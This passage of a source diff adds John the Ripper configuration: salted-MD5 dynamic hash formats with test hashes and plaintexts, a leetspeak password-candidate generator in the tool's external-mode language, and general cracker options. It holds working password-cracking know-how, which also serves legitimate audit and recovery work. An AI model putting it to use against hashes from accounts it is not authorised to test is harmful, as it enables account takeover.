+Func=DynamicFunc__append_keys
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_2008$534c2fb38e757d9448315abb9822db00$aaaSXB:test1
+Test=$dynamic_2008$02547864bed278658e8f54dd6dfd69b7$123456:thatsworking
+Test=$dynamic_2008$2f6f3881972653ebcf86e5ad3071a4ca$5555hh:test3
+TestD=$dynamic_2008$a96d6ab818950bafc6baeaa80df5ec5c$1234567890123456789012345678901234567890123456789012345678901234:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2009]
+Expression=md5($s.md5($p)) (salt > 23 bytes)
+Flag=MGF_SALTED
+Flag=MGF_KEYS_BASE16_IN1
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-200
+MaxInputLenX86=40
+MaxInputLen=40
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_input2_from_input
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_2009$b38c18b5e5b676e211442bd41000b2ec$aaaSXB:test1
+Test=$dynamic_2009$4dde7cd4cbf0dc4c59b255ae77352914$123456:thatsworking
+Test=$dynamic_2009$899af20e3ebdd77aaecb0d9bc5fbbb66$5555hh:test3
+
+[List.Generic:dynamic_2010]
+Expression=md5($s.md5($s.$p)) (PW > 32 or salt > 23 bytes)
+Flag=MGF_SALTED
+#Flag=MGF_KEYS_BASE16_IN1
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-64
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__MD5_crypt_input1_append_input2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_2010$781f83a676f45169dcfc7f36dfcdc3d5$aaaSXB:test1
+Test=$dynamic_2010$f385748e67a2dc1f6379b9124fabc0df$123456:thatsworking
+Test=$dynamic_2010$9e3702bb13386270cd4b0bd4dbdd489e$5555hh:test3
+TestD=$dynamic_2010$74fe90a89e9e6ee5ea28d4a92640eda5$1234567890123456789012345678901234567890123456789012345678901234:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2011]
+Expression=md5($s.md5($p.$s)) (PW > 32 or salt > 23 bytes)
+Flag=MGF_SALTED
+#Flag=MGF_KEYS_BASE16_IN1
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-64
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__MD5_crypt_input1_append_input2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_2011$f809a64cbd0d23e099cd5b544c8501ac$aaaSXB:test1
+Test=$dynamic_2011$979e6671535cda6db95357d8a0afd9ac$123456:thatsworking
+Test=$dynamic_2011$78a61ea73806ebf27bef2ab6a9bf5412$5555hh:test3
+TestD=$dynamic_2011$d5acc2492e19cbf252d54942b4c7620b$1234567890123456789012345678901234567890123456789012345678901234:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+#[List.Generic:dynamic_2012]
+#dynamic_12 already in MGF_FLAT_BUFFERS, so no reason for dynamic_2012
+
+#[List.Generic:dynamic_2013]
+#dynamic_13 already in MGF_FLAT_BUFFERS, so no reason for dynamic_2013
+
+[List.Generic:dynamic_2014]
+Expression=md5($s.md5($p).$s) (PW > 55 or salt > 11 bytes)
+Flag=MGF_SALTED
+Flag=MGF_KEYS_BASE16_IN1
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-40
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_input2_from_input
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_2014$778e40e10d82a08f5377992330008cbe$aaaSXB:test1
+Test=$dynamic_2014$d6321956964b2d27768df71d139eabd2$123456:thatsworking
+Test=$dynamic_2014$1b3c72e16427a2f4f0819243877f7967$5555hh:test3
+TestD=$dynamic_2014$6f20299d2e889eea146d141e92e91da1$1234567890123456789012345678901234567890:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+#[List.Generic:dynamic_2015]
+#dynamic_15 already in MGF_FLAT_BUFFERS, so no reason for dynamic_2015
+
+#[List.Generic:dynamic_2016]
+#dynamic_16 already in MGF_FLAT_BUFFERS, so no reason for dynamic_2016
@@ -0,0 +1,344 @@
+[List.HybridLeet:new]
+    int i, j;
+	int c, p;
+	int totrots;
+	int length;
+
+	/* Get the word length */
+	length = 0; while (word[length++]) ; --length;
+
+	/* Skip if this word length is out of bounds
+	   This should not be necessary, but we'll leave it here to be defensive */
+	if (req_minlen > length || (req_maxlen && req_maxlen < length ))
+	{
+		hybrid_total = 0;
+		return;
+	}
+
+	/* Calculate word rotations */
+
+	word_rot_count=0; 	/* Number of letter positions we are rotating for this word */
+	totrots = 1; 		/* Number of total rotation iterations */
+
+	i=0;
+	while (i < length)
+	{
+		/* is this letter one of our rotators? a,A, b,B etc*/
+		c = word[i];
+		j = 0;
+		while (j < rot_poslen)
+		{
+			p = rot_pos[j];
+			if (c == rot_chars[p] || c == rot_chars[p+1]) 	/* Is 'a' or 'A' for example */
+			{
+				word_rot_idx[word_rot_count] = i;		/* Save off which letter position in the word we are rotating */
+				word_rot_pos[word_rot_count] = j;		/* Save off the rotation position for this slot */
+				word_rotchars_pos[word_rot_count] = p; 	/* Save off the first letter position in the rotation */
+				word_rot_count++;
+
+				/* Also, set the word to the first letter in the rotation so we ensure to go through all of them */
+				word[i] = rot_chars[p];
+
+				/* And multiple number of total rotations by the number of rotations for this position */
+				totrots = totrots * rot_len[j];
+
+				break;
+			}
+			j++;
+		}
+		i++;
+	}
+
+	hybrid_total = totrots;
+
+	/* Reset or counter for THIS word. */
+	word_rot_current = 0;
+
+[List.External:HybridLeet]
+
+/*
+    Static context
+    String lengths here are arbitrary, increase them if you increase the
+    size of the stuff in the init() procedure
+*/
+
+int rot_chars[256];		/* All characters to rotate */
+int rot_charslen;    	/* The length of the rot_chars buffer */
+
+int rot_len[26];    	/* The number of characters to rotate through per letter */
+int rot_pos[26];    	/* The starting position of each letter group in the rot_chars string */
+int rot_poslen;			/* Length of rot_pos and rot_len arrays (both same size) */
+
+int word_rot_idx[128];  		/* The positions in the current word that require rotations (index into word)*/
+int word_rot_pos[128];  		/* The rot_pos index for each letter position in the current word that we are rotating (index into rot_pos)*/
+int word_rotchars_pos[128];  	/* The current rot_chars index for each letter position in the current word that we are rotating (state of rotation, index into rot_chars)*/
+int word_rot_count;     		/* The number of letters that we are rotating in the current word (size of word_rot_idx, word_rot_pos, and word_rotchars_pos) */
+
+int word_rot_current;	/* The rotation number of the current word */
+
+void init()
+{
+	int rci;
+	int ri;
+
+	rot_charslen=0;
+	rci=0;
+	ri=0;
+
+	/* a */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'a'; /* The first two chars are always the lower */
+	rot_chars[rci++] = 'A'; /* and upper case letters to rotate on */
+	rot_chars[rci++] = '4';
+	rot_chars[rci++] = '@';
+	rot_chars[rci++] = '8';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* b */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'b';
+	rot_chars[rci++] = 'B';
+	rot_chars[rci++] = '8';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'c';
+	rot_chars[rci++] = 'C';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'd';
+	rot_chars[rci++] = 'D';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* e */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'e';
+	rot_chars[rci++] = 'E';
+	rot_chars[rci++] = '3';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'f';
+	rot_chars[rci++] = 'F';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'g';
+	rot_chars[rci++] = 'G';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* h */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'h';
+	rot_chars[rci++] = 'H';
+	rot_chars[rci++] = '#';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* i */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'i';
+	rot_chars[rci++] = 'I';
+	rot_chars[rci++] = '1';
+	rot_chars[rci++] = '!';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'j';
+	rot_chars[rci++] = 'J';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'k';
+	rot_chars[rci++] = 'K';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* l */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'l';
+	rot_chars[rci++] = 'L';
+	rot_chars[rci++] = '1';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'm';
+	rot_chars[rci++] = 'M';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'n';
+	rot_chars[rci++] = 'N';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* o */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'o';
+	rot_chars[rci++] = 'O';
+	rot_chars[rci++] = '0';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'p';
+	rot_chars[rci++] = 'P';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'q';
+	rot_chars[rci++] = 'Q';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'r';
+	rot_chars[rci++] = 'R';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* s */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 's';
+	rot_chars[rci++] = 'S';
+	rot_chars[rci++] = '$';
+	rot_chars[rci++] = '5';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* t */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 't';
+	rot_chars[rci++] = 'T';
+	rot_chars[rci++] = '+';
+	rot_chars[rci++] = '7';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'u';
+	rot_chars[rci++] = 'U';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'v';
+	rot_chars[rci++] = 'V';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'w';
+	rot_chars[rci++] = 'W';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'x';
+	rot_chars[rci++] = 'X';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'y';
+	rot_chars[rci++] = 'Y';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'z';
+	rot_chars[rci++] = 'Z';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_charslen = rci;
+	rot_poslen = ri;
+
+}
+
+/* new word */
+void new()
+{
+.include [List.HybridLeet:new]
+}
+
+void next()
+{
+	int i, j;
+
+	/* If we have reached the maximum number of rotations, we're done */
+	if (word_rot_current == hybrid_total)
+	{
+		word[0] = 0;
+		return;
+	}
+
+	/* set word[] to the next candidate */
+	i=0;
+	while (i < word_rot_count)
+	{
+		/* Replace letter in word with appropriate rotated letter fom rot_chars */
+		word[word_rot_idx[i]] = rot_chars[word_rotchars_pos[i]];
+		i++;
+	}
+
+	/* Rotate the word_rotchars_pos */
+	i=0;
+	while (i < word_rot_count)
+	{
+		word_rotchars_pos[i]++;
+
+		j = word_rot_pos[i];
+		if (word_rotchars_pos[i] != (rot_pos[j] + rot_len[j]))
+		{
+			/* No carry */
+			break;
+		}
+
+		/* Rotation overflow, carry to next rotation */
+		word_rotchars_pos[i] = rot_pos[j];
+
+		i++;
+	}
+
+	word_rot_current++;
+}
+
+/* Called when restoring an interrupted session */
+void restore()
+{
+	int wrc;
+
+.include [List.HybridLeet:new]
+
+	/* Pick up the current iteration */
+	word_rot_current = hybrid_resume;
+
+	/* Zoom the word_rotchars_pos to the hybrid_resume iteration */
+	i=0;
+	wrc = word_rot_current;
+
+	while (i < word_rot_count)
+	{
+		j = word_rot_pos[i];
+
+		/* Rotate this position */
+		word_rotchars_pos[i] = rot_pos[j] + (wrc % rot_len[j]);
+		wrc = wrc / rot_len[j];
+
+		i++;
+	}
+}
@@ -0,0 +1,3899 @@
+#
+# This file is part of John the Ripper password cracker,
+# Copyright (c) 1996-2006,2008-2013 by Solar Designer
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted.
+#
+# There's ABSOLUTELY NO WARRANTY, express or implied.
+#
+# Please note that although this configuration file is under the cut-down BSD
+# license above, many source files in John the Ripper are under GPLv2.
+# For licensing terms for John the Ripper as a whole, see doc/LICENSE.
+#
+# ...with changes in the jumbo patch, by various authors
+#
+
+# The [Options] section is for general options only.
+# Note that MPI specific options have been moved
+# to [Options.MPI]
+# There is also a new section [Options.OpenCL]
+# for OpenCL specific options
+# Default settings for Markov mode have been moved
+# to [Markov.Default], but you can define other
+# Markov modes as well, see ../doc/MARKOV
+[Options]
+# Default wordlist file name (including in batch mode)
+Wordlist = $JOHN/password.lst
+# Use idle cycles only
+Idle = Y
+# Crash recovery file saving delay in seconds
+Save = 60
+# Beep when a password is found (who needs this anyway?)
+Beep = N
+# if set to Y then dynamic format will always work with bare hashes. Normally
+# dynamic only uses bare hashes if a single dynamic type is selected with
+# the -format=  (so -format=dynamic_0 would use valid bare hashes).
+DynamicAlwaysUseBareHashes = N
+
+# Default Single mode rules
+SingleRules = Single
+
+# Default batch mode Wordlist rules
+BatchModeWordlistRules = Wordlist
+
+# Default wordlist mode rules when not in batch mode (if any)
+# If this is set and you want to run once without rules, use --rules:none
+#WordlistRules = Wordlist
+
+# Default loopback mode rules (if any)
+# If this is set and you want to run once without rules, use --rules:none
+LoopbackRules = Loopback
+
+# Max. number of times to warn about crypting suboptimally small batches,
+# before suppressing the warnings.
+MaxKPCWarnings = 10
+
+# If set to true, relax the KPC warning checks and only warn for really
+# bad situations (the fewer salts, the more slack).
+RelaxKPCWarningCheck = N
+
+# Default/batch mode Incremental mode
+# Warning: changing these might currently break resume on existing sessions
+DefaultIncremental = ASCII
+#DefaultIncrementalUTF8 = UTF8
+DefaultIncrementalLM = LM_ASCII
+
+# Time formatting string used in status ETA.
+#
+# TimeFormat24 is used when ETA is within 24h, so it is possible to omit
+# the date then if you like, and show seconds instead.
+#
+# %c  means 'local' specific canonical form, such as:
+# 05/06/11 18:10:34
+#
+# Other examples
+# %d/%m/%y %H:%M   (day/mon/year hour:min)
+# %m/%d/%y %H:%M   (mon/day/year hour:min)
+# %Y-%m-%d %H:%M   (ISO 8601 style, 2011-05-06 18:10)
+TimeFormat = %Y-%m-%d %H:%M
+TimeFormat24 = %H:%M:%S
+
+#
+# optional add a date timestamp in front of every logged line.
+# the default is no timestamp logging. See the docs for
+# strftime for more information:
+# http://en.cppreference.com/w/c/chrono/strftime
+#
+# 2016-02-20T22:35:38+01:00 would be %Y-%m-%dT%H:%M:%S%z
+# Feb 20 22:35:38           would be %b %d %H:%M:%S
+#LogDateFormat = %Y-%m-%dT%H:%M:%S%z
+
+# if log date is being used, the time will default to local
+# time.  But if the next line is uncommented, it will output
+# in UTC.  Note, if LogDateFormat is not set, this option
+# does nothing.
+#LogDateFormatUTC = Y
+
+# if logging to stderr (--log-stderr command line switch used),
+# then use date format when outputting to the stderr.
+#LogDateStderrFormat = %b %d %H:%M:%S
+
+# This can be used to colorize (on screen) or otherwise emphasize (in log
+# files) output whenever a supposed administrator password gets cracked.
+#
+# Set this to N or comment it out to disable all "MarkAdmin" stuff.
+MarkAdminCracks = Y
+
+# If MarkAdminCracks = Y above, the below will be used (if defined) for
+# terminal output. The default is to change color to red before the username
+# and reset to normal after it. Any "^" characters will be parsed as ESC for
+# use in ANSI codes (like in the defaults)
+MarkAdminStart = ^[31m
+MarkAdminEnd = ^[0m
+
+# If MarkAdminCracks = Y above, the below will be used (if defined) for logs.
+# This literal string will be printed after the " + Cracked: root" line.
+MarkAdminString = (ADMIN ACCOUNT)
+
+# Permissions to set for session.log file
+# Default is 0600
+#LogFilePermissions = 0600
+
+# Permissions to set for POT file
+# Default is 0600
+#PotFilePermissions = 0600
+
+# John exits if another user owns log or pot file because CHMOD fails,
+# If this is set John prints a warning and continues
+# Default is N
+#IgnoreChmodErrors = N
+
+# This figure is in MB. The default is to memory map wordlists not larger
+# than one terabyte.
+# Set this to 0 to disable any use of memory-mapping in wordlist mode.
+WordlistMemoryMapMaxSize = 1048576
+
+# For single mode, load the full GECOS field (before splitting) as one
+# additional candidate. Normal behavior is to only load individual words
+# from that field. Enabling this can help when this field contains email
+# addresses or other strings that are better used unsplit, but it increases
+# the number of words tried so it may also slow things down.
+PristineGecos = N
+
+# Add an extra pass when loading Single words, that tries to parse things
+# like JEdgarHoover to J Edgar Hoover and so on.
+JumboSingleWords = N
+
+# For single mode, ignore the login field.
+# Normal behavior is to use the login field for single mode.
+# Skipping the login field should only be enabled if previous single mode
+# sessions did already make use of the login field, but no other information,
+# and now you want to use other information, skip the login field, but still
+# want the login field to be reported on successful cracks or with --show.
+SingleSkipLogin = N
+
+# Over-ride SINGLE_WORDS_PAIR_MAX in params.h.  This may slow down Single mode
+# but it may also help cracking a few more candidates.  Default in core John
+# is 4 while the Jumbo default is 6.  This limit is automagically increased
+# by word seed options --single-seed and/or --single-wordlist if needed.
+SingleWordsPairMax = 6
+
+# Un-commenting this stops Single mode from re-testing guessed plaintexts
+# with all other salts.
+#SingleRetestGuessed = N
+
+# Set the maximum word buffer size used by Single mode. The default is
+# 4 GB. If running fork this is the *total* used by a session (size is
+# divided by number of forks). If running MPI, we try to determine the
+# number of local processes on each node and divide it accordingly.
+SingleMaxBufferSize = 4
+
+# When running single mode with a GPU or accelerator, we prioritize speed
+# (saturating buffers) over resume ability:  When resuming such a session
+# it may take longer to catch up.  Set this option to Y to prioritize
+# resuming instead, at the cost of max. speed.
+SinglePrioResume = N
+
+# Protect the restore files (*.rec) from being overwritten. The default
+# mode is "Disabled". This mode will provide no protection, but has been
+# the default mode in JtR forever, so to not change behavior, that mode
+# has been kept as default.  You can change this to "Named" or "Always"
+# If this option is changed to "Named", then any restore file created
+# with a --session=xxxx will be protected from being overwritten. If
+# the option is set to "Always", then all .rec files will be kept from
+# being overwritten, even ${JOHN}/john.rec file
+#SessionFileProtect = Named
+
+# Protect the log files (*.log) from being reused by new sessons.
+# The default mode is "Disabled". That means, a nee session will just append
+# to an existing log file.
+# With "Named", a new session will not be allowed to append to an existing
+# log file, except if the --session=NAME option hasn't been used.
+# With "Always", not even the default log file ${JOHN}/john.log can be
+# reused by a new session.
+# (Of course, a restored session will always be allowed to append to an
+# existing log file.)
+# Unless you use the --nolog option, setting LogFileProtect will also
+# prevent overwriting existing session files.
+#LogFileProtect = Named
+
+# Emit a status line whenever a password is cracked (this is the same as
+# passing the --crack-status option flag to john). NOTE: if this is set
+# to true here, --crack-status will toggle it back to false.
+CrackStatus = N
+
+# When printing status, show number of candidates tried (eg. 123456p).
+# This is added to the "+ Cracked" line in the log as well (and that figure
+# will be exact while the screen output will be a multiple of batch size).
+StatusShowCandidates = N
+
+# Write cracked passwords to the log file (default is just the user name)
+LogCrackedPasswords = N
+
+# Disable the dupe checking when loading hashes. For testing purposes only!
+NoLoaderDupeCheck = N
+
+# Default encoding for input files (ie. login/GECOS fields) and wordlists
+# etc.  If this is not set here and --encoding is not used either, the default
+# is ISO-8859-1 for Unicode conversions and 7-bit ASCII encoding is assumed
+# for rules, e.g., uppercasing of letters other than a-z will not work at all!
+DefaultEncoding = UTF-8
+
+# Default --target-encoding for Microsoft hashes (LM, NETLM et al) when input
+# encoding is UTF-8. CP850 would be a universal choice for covering most
+# "Latin-1" countries.
+DefaultMSCodepage = CP850
+
+# Default internal legacy codepage to be used by mask mode and within the
+# rules engine, when both input and target encodings are Unicode (eg. UTF-8
+# wordlist and NT hashes). In some cases this hits performance but lets us
+# do things like Unicode case conversions. You can pick any supported
+# legacy codepage that has as much support for the input data as possible,
+# e.g., for "Latin-1" language passwords you can use ISO-8859-1, CP850 or
+# CP1252 and it will hardly make any difference but in some cases, ISO-8859-1
+# is fastest. Using "UTF-8" (which is not a legacy codepage!) will disable.
+#
+# The default is to NOT use any internal codepage.
+#DefaultInternalCodepage = ISO-8859-1
+
+# Warn if seeing UTF-8 when expecting some other encoding, or vice versa.
+# This is disabled for ASCII or RAW encodings, for performance.
+WarnEncoding = Y
+
+# Always report (to screen and log) cracked passwords as UTF-8, regardless of
+# input encoding. This is recommended if you have your terminal set for UTF-8.
+AlwaysReportUTF8 = Y
+
+# Always store Unicode (UTF-16) passwords as UTF-8 in john.pot, regardless
+# of input encoding. This prevents john.pot from being filled with mixed
+# and eventually unknown encodings. This is recommended if you have your
+# terminal set for UTF-8 and/or you want to run --loopback for LM->NT
+# including non-ASCII.
+UnicodeStoreUTF8 = Y
+
+# Always report/store non-Unicode formats as UTF-8, regardless of input
+# encoding. Note: The actual codepage that was used is not stored anywhere
+# except in the log file.
+# This is needed e.g. for --loopback to crack LM->NT including non-ASCII.
+CPstoreUTF8 = Y
+
+# Normally, we try to handle Unicode characters not in our selected codepage
+# with best effort. Enabling this option will instead translate any such
+# character to "?" (default), to meet certain formats' behavior.
+EmulateBrokenEncoding = N
+ReplacementCharacter = ?
+
+# Default verbosity is 3, valid figures are 1-5 right now.
+# 4-5 enables some extra output and diagnostics.
+# 4 is same verbosity as "john proper" aka. non-jumbo.
+# 3 mutes rules & incremental output in logs (LOTS of lines).
+# 2 mutes some other diagnostics.
+# 1 even mutes printing (to screen) of cracked passwords.
+Verbosity = 3
+
+# If set to Y, do not output, log  or store cracked passwords verbatim.
+# This implies a different default .pot database file "secure.pot" instead
+# of "john.pot" but it can still be overridden using --pot=FILE.
+# This also overrides other options, e.g. LogCrackedPasswords.
+SecureMode = N
+
+# If set to Y, a session using --fork or MPI will signal to other nodes when
+# it has written cracks to the pot file, so they will re-sync. Note that this
+# may be delayed by buffers and the "Save" timer setting near top of this file.
+ReloadAtCrack = N
+
+# If set to Y, a session using --fork or MPI will signal to other nodes when
+# it has cracked all hashes (there's nothing more to do!). This is ignored
+# when ReloadAtCrack = Y because it's redundant.
+ReloadAtDone = Y
+
+# If set to Y, resync pot file when saving session. This does not involve any
+# signalling, we just detect that someone else wrote to the pot file.
+# This will sync with concurrent sessions even when not using --fork or MPI
+# but it may be delayed by the "Save" timer setting near top of this file.
+ReloadAtSave = Y
+
+# If this file exists, john will abort cleanly
+AbortFile = /var/run/john/abort
+
+# While this file exists, john will pause
+PauseFile = /var/run/john/pause
+
+# If set to true, the uid will be appended to user name on cracks
+#   With:     password123      (Administrator:500)
+#   Without   password123      (Administrator)
+# This is disabled by --save-memory.
+ShowUIDinCracks = N
+
+# This sets the "grace time" for --max-run-time=N. If john has not finished
+# this long after the initial abort signal, it will send another one (similar
+# to pressing ctrl-c a second time) which will stop john immediately and not
+# wait further for an optimal resume point.
+# Setting this to 0 means NO grace time - immediately abort. Setting it to
+# a negative number means UNLIMITED grace time - never hard abort.
+AbortGraceTime = 30
+
+# Setting this to true allows SAP-B and SAP-G "half hashes" to be cracked.
+# These are taken from RFC_READ_TABLE and padded with nulls to correct length.
+# This may produce some false positives if enabled, at least for SAP-B.
+SAPhalfHashes = N
+
+# This allows you to list a few words/names that will be used by single mode
+# as if they were included in every GECOS field.  Use sparingly! Please note
+# that the example words are commented out, so the list is empty!
+[List.Single:SeedWords]
+#Pass
+#Secret
+#Test
+
+# This allows you to read extra pot files when loading hashes. Nothing will
+# ever be written to these files, they are just read. Any directory in this
+# list will be traversed and files in it with an extension of .pot will be
+# read. However there will NOT be any recursion down further directory levels.
+# Any entries that don't exist will be silently ignored.
+[List.Extra:Potfiles]
+#somefile.pot
+#somedirectory
+#$JOHN/my.pot
+
+[Options:CPUtune]
+# If preset is given, use it and skip autotune (NOTE: non-intel archs will
+# currently ignore this option and always autotune)
+UsePreset = Y
+# Performance sample time, default 10 ms
+AutoTuneSampleTime = 10
+# Required gain to consider this scale better. Default is 1 %
+AutoTuneReqGain = 1
+# Max crypt_all() duration for trying a higher scale, default 100 ms
+AutoTuneMaxDuration = 100
+# If we tried this many increases of scale w/o gain, give up. Default 3.
+AutoTuneMaxNoProgress = 3
+
+[Options:MPI]
+# Automagically disable OMP if MPI is used (set to N if
+# you want to run one MPI process per multi-core host)
+MPIOMPmutex = Y
+
+# Print a notice if disabling OMP (when MPIOMPmutex = Y)
+# or when running OMP and MPI at the same time
+MPIOMPverbose = Y
+
+# Assume all MPI nodes are homogenous; Enforce same OpenCL workgroup sizes.
+MPIAllGPUsSame = N
+
+# These formats are disabled from all-formats --test runs, or auto-selection
+# of format from an input file. Even when disabled, you can use them as long
+# as you spell them out with the --format option. Or you can delete a line,
+# comment it out, or change to 'N'
+[Disabled:Formats]
+#formatname = Y
+.include '$JOHN/dynamic_disabled.conf'
+
+# Options that may affect both GPUs and other accelerators (eg. FPGA)
+[Options:GPU]
+# Show GPU temperature, fan and utilization along with normal status output
+SensorsStatus = Y
+
+# If SensorsStatus is true, individual ones can be turned off
+TempStatus = Y
+UtilStatus = N
+FanStatus = N
+
+# Abort session if GPU hits this temperature (in C)
+AbortTemperature = 95
+
+
+# ZTEX specific settings
+[ZTEX:descrypt]
+# The design has two programmable clocks. The 1st one is supplied to
+# pipelines of DES rounds, the 2nd clock is supplied to comparators.
+# Startup frequencies are 220,160.
+#Frequency = 220,160
+
+[ZTEX:bcrypt]
+# Define typical setting of hashes it's going to process. It allows
+# to adjust for best performance.
+TargetSetting = 6
+# Startup frequency for bcrypt-ztex is 140. Design tools guaranteed
+# 141.5 in worst-case temperature and voltage.
+Frequency = 141
+# It's possible to set frequency on per-board and per-fpga basis.
+#Frequency_04A36E0FD6 = 142
+#Frequency_04A36E0FD6_0 = 143
+#Frequency_04A36E0FD6_3 = 144
+
+[ZTEX:sha512crypt]
+#TargetRounds = 5000
+# Design tools reported possible frequency to be 215 MHz.
+# We never encountered a board where this worked anywhere close
+# to such high frequency. Default frequency is set to 160 MHz.
+# Some lucky boards might run at some higher frequency.
+Frequency = 160
+#Config1 = \x00\x00
+
+[ZTEX:Drupal7]
+#TargetRounds = 16384
+# Drupal7 uses same bitstream as sha512crypt, see comment regarding
+# default frequency in sha512crypt section.
+#Frequency = 160
+# Some bitstreams accept runtime configuration.
+# In sha512crypt/Drupal7, configuration is 2 bytes. That's interpreted
+# as a bitmask. By setting any of the lowest 10 bits to 1 it turns off
+# corresponding unit (there are 10 units in the bitstream).
+# This turns off units 0 and 1.
+#Config1 = \x03\x00
+# This turns off all 10 units (resulting in a timeout).
+#Config1_04A36E0FD6_0 = \xff\x03
+
+[ZTEX:sha256crypt]
+# Design tools reported possible frequency is 166.3 but tested boards
+# miss guesses, often fail unless frequency is decreased.
+#Frequency = 165
+Frequency = 135
+#TargetRounds = 1000000
+
+# md5crypt and phpass use same bitstream. Design tools reported
+# possible frequency is 202 MHz. Tested boards run OK at 180 MHz.
+[ZTEX:md5crypt]
+Frequency = 180
+
+[ZTEX:phpass]
+Frequency = 180
+#TargetRounds = 2048
+
+[Options:OpenCL]
+# Set default OpenCL device. Command line option will override this.
+# If not set, we will search for a GPU or fall-back to the most
+# powerful device.
+#Device = 0
+
+# If commented out and set to true, store LWS and GWS in session file for
+# later resume. Note that when resuming, this option is ignored: If the
+# session file was written with this option set, it will still be used.
+#ResumeWS = Y
+
+# Global max. single kernel invocation duration, in ms. Setting this low
+# (eg. 10-100 ms) gives you a better responding desktop but lower performance.
+# Setting it high (eg. 200-500 ms) will maximize performance but your desktop
+# may lag. Really high values may trip watchdogs (eg. 5 seconds). Some versions
+# of AMD Catalyst may hang if you go above 200 ms, and in general any good
+# kernel will perform optimally at 100-200 ms anyway.
+#Global_MaxDuration = 200
+
+# Some formats vectorize their kernels in case the device says it's a good
+# idea. Some devices give "improper" hints which means we vectorize but get
+# a performance drop. If you have such a device, uncommenting the below
+# will disable vectorizing globally.
+# With this set to N (or commented out) you can force it per session with
+# the --force-scalar command-line option instead.
